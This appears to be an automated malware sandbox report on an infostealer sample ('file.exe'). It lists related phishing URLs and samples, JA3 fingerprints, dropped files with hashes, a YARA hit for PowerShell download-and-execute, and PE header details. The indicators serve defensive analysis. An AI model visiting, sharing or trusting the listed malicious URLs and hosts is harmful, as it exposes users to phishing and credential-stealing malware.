AKAMAI-ASUS	https://drive.google.com/uc?export=download&id=1wbwVQjuH1HWwuDUlx8RyevjY45uih2Tz	Get hash	malicious	Unknown	Browse	23.47.168.24
	[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml	Get hash	malicious	Unknown	Browse	2.16.202.123
	[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml	Get hash	malicious	Unknown	Browse	2.19.126.160
	https://tracking.solutiondynamics.com/?cid=Watercare&src=Billing&eid=88632987&jid=90888&event=Mark2&dest=https://promising-sparkle-d7f0c0cfc9.media.strapiapp.com/tapped_in_winter_2024_a4a6bbe379.pdf	Get hash	malicious	Unknown	Browse	23.47.168.24
	https://xclengu.pages.dev/	Get hash	malicious	Unknown	Browse	92.123.12.145
	https://www.canva.com/design/DAGLxVDGbAs/6LEiPEltnSt5T8iX0Pb0Mg/edit?utm_content=DAGLxVDGbAs&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Unknown	Browse	92.123.12.157
	Statement 98373.pdf	Get hash	malicious	HTMLPhisher	Browse	23.47.168.24
	Copy of AttackSim_Uer_Guide_v1.2.docx	Get hash	malicious	Lsass Dumper, Mimikatz, Phisher, Trickbot	Browse	23.32.185.164
	https://www.evernote.com/shard/s539/sh/5b2b3875-a079-ba80-97b6-2df9862d39c8/Cu1KZqOYC6OfBBaa5bHEASuBRDJet2fDkYPa8McDeUOmOUEfT5rEzGwPMg	Get hash	malicious	Unknown	Browse	23.39.185.22
	ECO BOX due invoices #474745.msg	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	2.19.126.160
AMAZON-02US	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse	143.204.215.122
	https://drive.google.com/uc?export=download&id=1wbwVQjuH1HWwuDUlx8RyevjY45uih2Tz	Get hash	malicious	Unknown	Browse	3.160.156.17
	[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml	Get hash	malicious	Unknown	Browse	13.32.99.33
	https://sdfvgbcvb668.weebly.com/	Get hash	malicious	Unknown	Browse	54.68.234.150
	http://datingsitefree.pages.dev/link-2	Get hash	malicious	Unknown	Browse	13.224.189.43
	https://copyright-policy-violations.vercel.app/	Get hash	malicious	Unknown	Browse	76.76.21.164
	https://copyright-policy-violations.vercel.app/	Get hash	malicious	Unknown	Browse	76.76.21.123
	https://shelled-childlike-trouble.glitch.me/public/nfcu703553.HTML	Get hash	malicious	HTMLPhisher	Browse	34.247.205.196
	https://flame-halved-fight.glitch.me/public/nfcu703553.HTML	Get hash	malicious	HTMLPhisher	Browse	34.247.205.196
	https://tracking.solutiondynamics.com/?cid=Watercare&src=Billing&eid=88632987&jid=90888&event=Mark2&dest=https://promising-sparkle-d7f0c0cfc9.media.strapiapp.com/tapped_in_winter_2024_a4a6bbe379.pdf	Get hash	malicious	Unknown	Browse	3.24.175.113
MICROSOFT-CORP-MSN-AS-BLOCKUS	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse	23.96.180.189
	https://forms.office.com/Pages/ResponsePage.aspx?id=1Q-W37eeFkOVQFk99a-XlFYn76Ck1HRGrw1irS-ELQ9URTlQNkZEQk9aR1UyU0ZYQzNDUjVRWk1YUi4u	Get hash	malicious	Unknown	Browse	13.107.21.237
	https://create.piktochart.com/embed/21719c931afb-view-document	Get hash	malicious	Unknown	Browse	20.49.124.158
	[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml	Get hash	malicious	Unknown	Browse	52.109.28.47
	[SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml	Get hash	malicious	Unknown	Browse	52.109.68.129
	https://www.canva.com/design/DAGLxVDGbAs/6LEiPEltnSt5T8iX0Pb0Mg/edit?utm_content=DAGLxVDGbAs&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	Unknown	Browse	204.79.197.203
	Statement 98373.pdf	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	DRWG-347RB1.pd.xls	Get hash	malicious	Unknown	Browse	13.107.246.42
	https://dyt55sgbb.cc.rs6.net/tn.jsp?f=001LafnV_35y5vxxYdgMh0VVridKKB9hdGQCYOkGu3DPRmFIWY1xxOEqNvF4_xNWq8tTpFdM0trBnUIO9IbcyCKIWJN_5LZAnfgfALmUWC0ELhTiTiaDgUBaAXprLvn9KTxZ8qdNMj8vdeeSpRq3mxK2dxZ9gcQZTGstzp8DI1RW5AQOz9-FGIf9w==&c=-aXMZplohV7yem3p6Pg5OY0i2MDsaZOPtZ7J6H3joGp1dpCEnBhqog==&ch=PnfUz2iH-gOwLOHWdXrUmMuA4B8Krz8O-1H-S9kqSeGI6ca29rY59A==	Get hash	malicious	Unknown	Browse	13.107.42.14
GES-ASRU	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse	85.28.47.31
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	85.28.47.31
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Stealc	Browse	85.28.47.31
	file.exe	Get hash	malicious	Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse	85.28.47.31
	x83kv6AWyn.exe	Get hash	malicious	Stealc, Vidar	Browse	85.28.47.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	Collexus Knowledge Base Access.docx	Get hash	malicious	Unknown	Browse	40.68.123.157 20.190.159.4
	https://www.girisim.io/	Get hash	malicious	Unknown	Browse	40.68.123.157 20.190.159.4
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse	40.68.123.157 20.190.159.4
	https://sdfvgbcvb668.weebly.com/	Get hash	malicious	Unknown	Browse	40.68.123.157 20.190.159.4
	https://app-min-bankid-no.codeanyapp.com/well-known/AHDY/populaire/password.html	Get hash	malicious	Unknown	Browse	40.68.123.157 20.190.159.4
	http://pub-c098a9df86b743fa91e4681b997ad763.r2.dev/doc_start.html?folder=oquwappyolbhdrb75vnt&ledge	Get hash	malicious	Greatness Phishing Kit, HTMLPhisher	Browse	40.68.123.157 20.190.159.4
	https://www.giveway-dana10jt.danaviz.biz.id/	Get hash	malicious	Unknown	Browse	40.68.123.157 20.190.159.4
	https://www.turkiyecumhuriyetiziraatbankasi.com/en/product-and-service-fees.html	Get hash	malicious	Unknown	Browse	40.68.123.157 20.190.159.4
	https://teiegrcam-hk.vip/	Get hash	malicious	Unknown	Browse	40.68.123.157 20.190.159.4
	http://datingsitefree.pages.dev/link-2	Get hash	malicious	Unknown	Browse	40.68.123.157 20.190.159.4
fb0aa01abe9d8e4037eb3473ca6e2dca	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122
	file.exe	Get hash	malicious	Unknown	Browse	35.244.181.201 34.149.100.209 34.120.208.123 143.204.215.122

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	cLPbKg0oEK.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse
	x83kv6AWyn.exe	Get hash	malicious	Stealc, Vidar	Browse
	PdlzD56Vib.exe	Get hash	malicious	Stealc, Vidar	Browse
	TY3oxeY08f.exe	Get hash	malicious	Stealc, Vidar	Browse
	Ggu0bxIMHV.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	cLPbKg0oEK.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse
	hOYGfIcBVf.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse
	x83kv6AWyn.exe	Get hash	malicious	Stealc, Vidar	Browse
	PdlzD56Vib.exe	Get hash	malicious	Stealc, Vidar	Browse
	TY3oxeY08f.exe	Get hash	malicious	Stealc, Vidar	Browse
	Ggu0bxIMHV.exe	Get hash	malicious	Stealc, Vidar	Browse

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	12:ykaaD0JcaaD0JwQQJckaaD0JcaaD0JwQQJ:LtgJctgJwR9tgJctgJwR
MD5:	6DF8FD3BFD53B32120888BAA303B2C56
SHA1:	AD788C07AC433F41D6ACF0851B26AA9ECE1F7D21
SHA-256:	28E1293571D5E38A9D92842DE20E65162CC1843531B189F19A2FD57EC10BEA9B
SHA-512:	982066337645F835560321B21F728CDFDEC4733B0CEF8C2E8B3F5CE369198771CF82A2C6DE3A92247F726132C725E1369133CB5EB202B39491E5421314FFB53F
Malicious:	false
Preview:	*.>...........,.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................,.............................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9685897448000874
Encrypted:	false
SSDEEP:	192:1ZyGKn0dLP9j/XZrP2izuiFNZ24IO86A:jyGK0dLP9jtFzuiFNY4IO86A
MD5:	C0B377DD967D28F408AA09102ECAE795
SHA1:	B12DA1C96BDC9B45AD4AF4DAA83112D1031990C9
SHA-256:	9132D0595AA37B887D5BE5B3D278ACC76A849567F66A957BFE8721069A78B18F
SHA-512:	F7BAF7DC420349AD355F8EFE8C78AABB229D085A5181D40307E4FBA70ACE5163B93323E7A5E95678B69DDE5B80FFCD9D3C05DCE676869000E304300FCBD950F7
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.2.5.5.2.1.1.5.2.1.8.2.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.2.5.5.2.1.2.0.7.7.6.6.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.4.6.8.8.1.5.-.3.e.e.8.-.4.4.a.3.-.a.e.d.d.-.0.c.2.c.d.7.4.0.2.4.2.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.0.a.5.7.a.a.-.4.9.f.c.-.4.c.5.6.-.9.b.9.0.-.9.2.e.8.7.2.3.4.e.4.0.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.a.8.7.d.e.d.d.d.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.9.a.0.-.0.0.0.1.-.0.0.1.4.-.c.9.c.6.-.1.d.0.9.6.2.d.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.6.2.b.2.d.2.a.2.8.4.e.9.e.8.1.3.2.b.d.f.2.d.b.1.8.0.4.3.0.a.c.0.0.0.0.f.f.f.f.!.0.0.0.0.9.3.3.8.1.d.2.f.3.5.d.f.4.d.5.4.1.3.4.d.b.0.7.1.6.7.c.2.e.e.e.6.1.6.a.2.d.3.e.9.!.1.a.8.7.d.e.d.d.d.a...e.x.e.....T.a.r.g.e.t.A.p.p.

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	6439
Entropy (8bit):	5.140151073460681
Encrypted:	false
SSDEEP:	192:UjMi4a1cbhbVbTbfbRbObtbyEzn/nSrDtTJdB:UYgcNhnzFSJ5nSrDhJdB
MD5:	D2294AD4CB62B2A545832F85A0F81A8A
SHA1:	2B580C613ECE33A117E9316F9A5F05F4051602FD
SHA-256:	03A70408EEBDBEC779F9A786CC32AD04BFE105B6C215B65CDE1A38F33947ED23
SHA-512:	F58FEAD054C2E4E113D7BDED9C31371E736AAF3FF83EE8A8A17175CCC38CFE802078E14D2EF771BB391EB540BB53CC256F2924C7CBF5F120809DA0D7EC0CBB1F
Malicious:	false
Preview:	{"type":"uninstall","id":"37c920a3-3db9-44c4-bfa3-75a0f1c5cfe5","creationDate":"2024-07-24T01:53:13.865Z","version":4,"application":{"architecture":"x86-64","buildId":"20230927232528","name":"Firefox","version":"118.0.1","displayVersion":"118.0.1","vendor":"Mozilla","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","channel":"release"},"payload":{"otherInstalls":0},"clientId":"65e71c9e-6ac3-4903-9066-b134350de32c","environment":{"build":{"applicationId":"{ec8030f7-c20a-464f-9b0e-13a3a9e97384}","applicationName":"Firefox","architecture":"x86-64","buildId":"20230927232528","version":"118.0.1","vendor":"Mozilla","displayVersion":"118.0.1","platformVersion":"118.0.1","xpcomAbi":"x86_64-msvc","updaterAvailable":true},"partner":{"distributionId":null,"distributionVersion":null,"partnerId":null,"distributor":null,"distributorChannel":null,"partnerNames":[]},"system":{"memoryMB":8191,"virtualMaxMB":134217728,"cpu":{"isWindowsSMode":false,"count":4,"cores":2,"vendor":"GenuineIntel","name":"I

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26853
Entropy (8bit):	6.042501042128667
Encrypted:	false
SSDEEP:	768:VM7X2zt1jOXtXi3zahI1jPOB6xhS7OdMZc1K6vn0+kZ:VMSzMtXijaK1jkJCF0+kZ
MD5:	BC56E0918B554565DE82C4CF2E7B7DE9
SHA1:	3C36BA6F3889AF88BA7D76373EE1CE465B5D4090
SHA-256:	F2343431035AEBFA194C27CE2FE1DCF43431A5CDD0C79A2E50B3DBDB4BC14C7C
SHA-512:	B20EF64312A8647F2BED52C709BAEFA030F7C896BCF42357220FC03E05009C4B8CD0CD1B55936CE16DC5249A30B1F60C1CD0144F57A94B02DB3871942184B1B4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13366255156767680","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

Process:	C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	6.396064528548989
Encrypted:	false
SSDEEP:	3072:c1VB1NFj5qD6o8KaxfE54HnnGiayl+beX8na5acUsRFrJKa:c171jj5q62aOanGiqbIzUGFdKa
MD5:	CA10BC5DBF009B6DF405C2CCBDD22EFB
SHA1:	D1C8F25DAC637BA857EC28A0FFCFAFA73E23A622
SHA-256:	3C2245FB7F3D374D8685A573A6CAFBE79B5807F0F8CBD52F0CF4A203B785AB06
SHA-512:	61D6EBA16EB34DCB230C15D11AAD0C8CE8C64B79A886C6ACFBF58DAC777F32521D2D9FFB9D645A6CC763BFC0AA9BBA403C469BA24EB814E3A009D0AB7F30DAF8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\num[1].exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...P..f.....................B"......d............@..........................0$...........@....................................<.............................#.\|$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1694)
Category:	downloaded
Size (bytes):	30935
Entropy (8bit):	5.369630520613153
Encrypted:	false
SSDEEP:	768:OUIuSoKNexla7agsnMtpZZt9KYptfrx5t9F/mNgaRqPlNIC4BSfHX:FIuSoTOaytpXptzx5t9F+xAPUnCX
MD5:	AE057D30BC16CB32A65599CF09559EC3
SHA1:	BAA1C5159D5FC7FD437B5DADB4880DBEF8816E24
SHA-256:	11D4916DD4C57D7C64C6F151D2BF0BDF2C20138220858652C921680726B61ADE
SHA-512:	C254FC131350C319080A93C135DD7F6C6A5FB0206C9ED349B42334474896CB04FF5360AF076288DA00AFABA107FF126A2981EC4DE9D5B0FDB8DB9CDFF9D28DBE
Malicious:	false
URL:	"https://www.gstatic.com/_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.eeRqeAC2pNE.es5.O/ck=boq-identity.AccountsSignInUi.LlHfu4CKns0.L.B1.O/am=BBkMYHQbgUA8nAMfoBQIGQAAAAAAAAAAtAEAAMw/d=1/exm=_b,_tp/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlGVfPbeXOsuKLP_-2Q_JIHpBKcP4A/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;Erl4fe:FloWmf;JsbNhc:Xd8iUd;LBgRLc:XVMNvd;Me32dd:MEeYgc;NPKaK:PVlQOd;NSEoX:lazG7b;Oj465e:KG2eXe;Pjplud:EEDORb;QGR0gd:Mlhmy;SMDL4c:K0PMbc;SNUn3:ZwDk9d;UpnZUd:nnwwYc;XdiAjb:NLiXbe;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;eBAeSb:zbML3c;iFQyKf:vfuNJf;io8t5d:yDVVkb;kMFpHd:OTA3Ae;nAFL3:NTMZac;nTuGK:JKNPM;oGtAuc:sOXFj;oSUNyd:K0PMbc;oXZmbc:tUnxGc;pXdRYb:L9OGUe;qddgKe:xQtZb;sP4Vbe:VwDzFe;uY49fb:COQbmf;ul9GGd:VDovNc;vNjB7d:YTxL4;wR5FRb:siKnQd;yxTchf:KUM7Z/m=byfTOb,lsjVmc,LEikZe"
Preview:	"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi\|\|{};(function(_){var window=this;.try{.var Tqa=function(a,b){this.da=a;this.ea=b;if(!c){var c=new _.Jn("//www.google.com/images/cleardot.gif");_.Un(c)}this.ja=c};_.h=Tqa.prototype;_.h.Lc=null;_.h.kV=1E4;_.h.Ux=!1;_.h.rM=0;_.h.IG=null;_.h.hR=null;_.h.setTimeout=function(a){this.kV=a};_.h.start=function(){if(this.Ux)throw Error("ob");this.Ux=!0;this.rM=0;Uqa(this)};_.h.stop=function(){Vqa(this);this.Ux=!1};.var Uqa=function(a){a.rM++;navigator!==null&&"onLine"in navigator&&!navigator.onLine?_.Qk((0,_.If)(a.lE,a,!1),0):(a.aa=new Image,a.aa.onload=(0,_.If)(a.Kda,a),a.aa.onerror=(0,_.If)(a.Jda,a),a.aa.onabort=(0,_.If)(a.Ida,a),a.IG=_.Qk(a.Lda,a.kV,a),a.aa.src=String(a.ja))};_.h=Tqa.prototype;_.h.Kda=function(){this.lE(!0)};_.h.Jda=function(){this.lE(!1)};_.h.Ida=function(){this.lE(!1)};_.h.Lda=function(){this.lE(!1)};._.h.lE=function(a){Vqa(this);a?(this.Ux=!1,this.da.call(this.ea,!0)):this.rM<=0?Uqa(this):(this.Ux=!1,

Entrypoint:	0x402ed8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x658B6078 [Tue Dec 26 23:23:36 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d15dc29df6b6a9c18728234a754677f

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x33c74	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2056000	0x8340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x33cc4	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x33300	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x31000	0x1ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2f4a3	0x2f600	e897bb8b0fe6ed91bd2ec2d4e5d331c6	False	0.6582185850923483	data	6.4621846661743145	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x31000	0x3624	0x3800	14181f2d13a1893238559dcb343e8a2a	False	0.34102957589285715	data	4.847331644215366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x35000	0x2020bf0	0xba00	e301f410f46e37cb7e23840e32a6f153	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2056000	0x8340	0x8400	d4f9c029ea29cbe4c56c60cb87683366	False	0.3222064393939394	data	4.1134348720672635	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x20595c8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x20596f8	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0x20597d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x205a678	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x205af20	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0x205b4b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x205c360	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x205cc08	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x2056480	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5282258064516129
RT_ICON	0x2056480	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5282258064516129
RT_ICON	0x2056b48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.4121369294605809
RT_ICON	0x2056b48	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.4121369294605809
RT_ICON	0x20590f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.44769503546099293
RT_ICON	0x20590f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.44769503546099293
RT_STRING	0x205d430	0x452	data	Tamil	India	0.45479204339963836
RT_STRING	0x205d430	0x452	data	Tamil	Sri Lanka	0.45479204339963836
RT_STRING	0x205d888	0x28e	data	Tamil	India	0.481651376146789
RT_STRING	0x205d888	0x28e	data	Tamil	Sri Lanka	0.481651376146789
RT_STRING	0x205db18	0x826	data	Tamil	India	0.41850431447746883
RT_STRING	0x205db18	0x826	data	Tamil	Sri Lanka	0.41850431447746883
RT_ACCELERATOR	0x2059588	0x40	data	Tamil	India	0.875
RT_ACCELERATOR	0x2059588	0x40	data	Tamil	Sri Lanka	0.875
RT_GROUP_CURSOR	0x20597a8	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0x205b488	0x30	data			0.9166666666666666
RT_GROUP_CURSOR	0x205d170	0x30	data			0.9375
RT_GROUP_ICON	0x2059558	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0x2059558	0x30	data	Tamil	Sri Lanka	0.9375
RT_VERSION	0x205d1a0	0x290	MS Windows COFF PA-RISC object file			0.5137195121951219

DLL	Import
